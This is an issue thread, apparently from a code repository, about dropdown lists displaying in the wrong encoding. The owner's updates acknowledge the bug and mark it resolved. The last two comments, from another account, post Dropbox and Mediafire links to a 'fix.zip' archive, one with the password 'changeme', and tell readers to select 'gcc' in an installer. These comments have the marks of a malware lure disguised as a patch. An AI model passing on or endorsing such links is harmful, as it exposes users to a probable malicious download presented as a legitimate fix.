### ISSUE TITLE
The dropdown list for Business Place, Hierarchy Area and Address View details not in the correct encoding format.

### ISSUE THREAD

**Issue by B95krk** [B95krk/MDM#76]
https://docs.google.com/spreadsheets/d/1u767CbsIhbq5Wq6X_cqt8KvDXjx-arxP/edit?gid=1484164555#gid=1484164555

**Comment by B95krk** [comment]
**Progress Update**
 2-May-24:LW: Aknowledged. Will update further. This will include Route ID as well.

**Comment by B95krk** [comment]
**ReSolution**
09-May-24:LW:Issue Sorted out in New Org ID

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
